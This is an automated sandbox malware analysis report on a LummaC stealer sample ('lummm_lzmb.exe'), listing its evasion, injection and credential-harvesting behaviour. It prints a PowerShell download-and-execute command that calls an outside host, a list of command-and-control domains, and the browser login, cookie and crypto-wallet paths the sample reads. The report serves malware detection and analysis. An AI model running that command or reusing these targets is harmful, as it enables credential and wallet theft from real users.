Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: lummm_lzmb.exe PID: 6348, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\lummm_lzmb.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\lummm_lzmb.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Memory allocated: 12B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Memory allocated: 2E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Window / User API: threadDelayed 919	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Window / User API: threadDelayed 3131	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2904	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 896	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6588	Thread sleep count: 919 > 30	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6588	Thread sleep count: 3131 > 30	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -99563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98873s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98502s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98372s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98262s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98152s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6464	Thread sleep time: -98032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe TID: 6820	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep count: 2904 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep count: 896 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 99563	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98873	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98750	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98624	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98502	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98372	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98262	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98152	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Thread delayed: delay time: 98032	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\SolidDocuments	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Mozilla	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior

Source: lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: lummm_lzmb.exe, 00000001.00000002.1954001476.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: lummm_lzmb.exe, 00000001.00000002.1953703961.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhS
Source: lummm_lzmb.exe, 00000000.00000002.1713015095.000000000108E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Code function: 1_2_007EED60 LdrInitializeThunk,

1_2_007EED60

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Memory written: C:\Users\user\Desktop\lummm_lzmb.exe base: 7B0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: finickypwk.lat
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shoefeatthe.lat
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: savorraiykj.lat
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: kickykiduz.lat
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: miniatureyu.lat
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: leggelatez.lat
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: washyceehsu.lat
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bloodyswif.lat
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: burnressert.shop

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Process created: C:\Users\user\Desktop\lummm_lzmb.exe "C:\Users\user\Desktop\lummm_lzmb.exe"

Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; }
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; }			Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Queries volume information: C:\Users\user\Desktop\lummm_lzmb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: lummm_lzmb.exe, 00000001.00000002.1955436806.000000000318A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\lummm_lzmb.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: lummm_lzmb.exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
